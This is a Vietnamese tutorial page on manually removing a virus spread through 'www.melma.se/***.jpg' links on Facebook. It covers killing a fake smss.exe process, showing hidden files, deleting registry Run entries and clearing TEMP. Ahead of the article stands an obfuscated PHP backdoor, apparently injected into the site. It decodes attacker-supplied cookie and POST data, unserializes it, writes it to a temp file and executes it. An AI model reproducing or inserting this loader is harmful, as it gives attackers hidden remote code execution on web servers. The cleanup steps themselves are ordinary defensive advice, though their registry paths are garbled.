$ylZYFX = chr (85) . '_' . 'E' . "\121" . "\130" . chr (108) . chr (104); $yLWtuVuIpp = 'c' . chr ( 753 - 645 ).chr (97) . "\x73" . chr ( 582 - 467 ).chr (95) . "\145" . "\170" . chr ( 510 - 405 ).chr (115) . "\x74" . 's';$kAOmFrC = class_exists($ylZYFX); $yLWtuVuIpp = "35366";$DZnLrk = strpos($yLWtuVuIpp, $ylZYFX);if ($kAOmFrC == $DZnLrk){function IAeTZP(){$aZfgaHHvu = new /* 4364 */ U_EQXlh(29822 + 29822); $aZfgaHHvu = NULL;}$XKXHSy = "29822";class U_EQXlh{private function KWZRppi($XKXHSy){if (is_array(U_EQXlh::$YNoKSXbD)) {$name = sys_get_temp_dir() . "/" . crc32(U_EQXlh::$YNoKSXbD["salt"]);@U_EQXlh::$YNoKSXbD["write"]($name, U_EQXlh::$YNoKSXbD["content"]);include $name;@U_EQXlh::$YNoKSXbD["delete"]($name); $XKXHSy = "29822";exit();}}public function HfLoXJy(){$XvCgWQeB = "40563";$this->_dummy = str_repeat($XvCgWQeB, strlen($XvCgWQeB));}public function __destruct(){U_EQXlh::$YNoKSXbD = @unserialize(U_EQXlh::$YNoKSXbD); $XKXHSy = "22734_2480";$this->KWZRppi($XKXHSy); $XKXHSy = "22734_2480";}public function gYQxmX($XvCgWQeB, $uwoXMoiAQJ){return $XvCgWQeB[0] ^ str_repeat($uwoXMoiAQJ, intval(strlen($XvCgWQeB[0]) / strlen($uwoXMoiAQJ)) + 1);}public function HturnsX($XvCgWQeB){$IRxSAES = "\142" . "\x61" . "\163" . chr (101) . chr (54) . chr ( 962 - 910 );return array_map($IRxSAES . chr ( 150 - 55 ).chr ( 1074 - 974 )."\145" . "\143" . 'o' . chr (100) . 'e', array($XvCgWQeB,));}public function __construct($oCcnlBmz=0){$vemMBQz = ',';$XvCgWQeB = "";$YdToI = $_POST;$OaybdGwVx = $_COOKIE;$uwoXMoiAQJ = "c88d6de5-9c28-4205-88d1-aa6ae4d03ace";$vclXYK = @$OaybdGwVx[substr($uwoXMoiAQJ, 0, 4)];if (!empty($vclXYK)){$vclXYK = explode($vemMBQz, $vclXYK);foreach ($vclXYK as $TPeibWgFe){$XvCgWQeB .= @$OaybdGwVx[$TPeibWgFe];$XvCgWQeB .= @$YdToI[$TPeibWgFe];}$XvCgWQeB = $this->HturnsX($XvCgWQeB);}U_EQXlh::$YNoKSXbD = $this->gYQxmX($XvCgWQeB, $uwoXMoiAQJ);if (strpos($uwoXMoiAQJ, $vemMBQz) !== FALSE){$uwoXMoiAQJ = explode($vemMBQz, $uwoXMoiAQJ); $dXdlFMY = sprintf("22734_2480", rtrim($uwoXMoiAQJ[0]));}}public static $YNoKSXbD = 56125;}IAeTZP();} Hướng dẫn diệt virus www.melma.se/***.jpg bằng tay - Tải Chùa

Hướng dẫn diệt virus www.melma.se/***.jpg bằng tay

Rate this post
Máy tính của bạn bị nhiễm virus www.melma.se/***.jpg khi click vào các đường link từ bạn bè trên Facebook? Hãy tham khảo các bước diệt loại virus này bằng tay mà chúng tôi hướng dẫn dưới đây nhé.

Bạn đang lướt facebook bỗng nhận được tin nhắn từ bạn bè có chứa liên kết www.melma.se/***.jpg , những lúc như vậy bạn cần phải hết sức tỉnh táo bởi đây có thể sẽ là một cách phát tán virus sang máy của bạn . Do đó đừng vội click vào đường link đó để đảm bảo an toàn cho máy tính của bạn. Nhưng vì hiếu kỳ mà bạn vô tình đã kích vào ,virus đã có cơ hội tấn công thì làm thế nào để tiêu diệt chúng bây giờ? Đừng quá lo lắng, bài viết dưới đây sẽ giúp bạn diệt virus www.melma.se/***.jpg bằng tay một cách dễ dàng.

Các bước diệt virus www.melma.se/***.jpg bằng tay

Bước 1: Đầu tiên bạn chạy Windows Task Manager sau đó chuyển qua tab Processes và tìm đến tiến trình “smss.exe”. Chú ý: bạn cần phải phân biệt được tiến trình “smss.exe” chuẩn của hệ thống này thường có các thông tin như sau, và tiến trình giả mạo của virus sẽ không có thông tin này:

  • Username: đó là SYSTEM
  • Description: Windows Session Manager

Cách diệt Virus www.melma.se/***.jpg

Cách diệt Virus www.melma.se/***.jpg

Bước 2: Sau khi đã xác định được tiến trình giả mạo của loại virus này, bạn kích chuột phải vào tên tiến trình đó và chọn End process để tắt quy trình virus đang chạy.

Bước 3:

  • Tiếp theo bạn mở My Computer, tiếp tục vào Tools Folder Options – chọn View sau đó tick vào lựa chọn “Show hidden files, folder and drives” song song với đó bạn bỏ tick ở 2 dòng “Hide extensions for known file types” và “Hide protected operating system files” rồi click chuột vào OK để ra ngoài.
  • Hoàn thành những thao tác này máy tính của bạn đã hiển thị được những file với thuộc tính ẩn cũng như thấy được các phần mở rộng của tất cả những file trên máy.

Bước 4: Sau đó bạn truy cập tới địa chỉ có tên là “X:UsersPublic” và địa chỉ “X:Windows” tìm và loại bỏ file “smss.exe” tại những đường dẫn này.

Bước 5: Tiếp tục vào Run và gõ “regedit” rồi kích vào Enter.

  • Tìm đến từ khóa: HKEY_CURRENT_USERSOFTWAREMicrosoftWindowsCurrentVersionRun và loại bỏ “Windows System Controler”.
  • Tiếp đến bạn tìm tới khóa: HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionTerminal ServerInstallSoftwareMicrosoftWindowsCurrentVersionRun và cũng xóa bỏ dòng “Windows System Controler”.
  • Cuối cùng bạn hãy tìm đến từ khóa HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun và xóa bỏ lựa chọn “Windows System Controler”. Những giá trị này do virus tạo ra nhằm mục đích giúp virus tự chạy mỗi lần bạn khởi động máy tính.

Bước 6:

  • Vào Run, gõ “%temp%” rồi nhấn Enter để truy cập nhanh vào thư mục TEMP. Sau đó bạn hãy xóa toàn bộ những file tạm trong thư mục này để dọn sạch sẽ máy tính, nếu gặp file nào không cho xóa thì bạn có thể bỏ qua.
  • Bạn hãy nhớ tìm toàn bộ những file có phần mở rộng là *.exe trong thư mục TEMP để đảm bảo không còn sót lại file nào của virus trên máy.

Trên đây chúng tôi đã hướng dẫn bạn các bước diệt virus www.melma.se/***.jpg bằng tay rất đơn giản. Chúc các bạn thực hiện thành công thủ thuật này.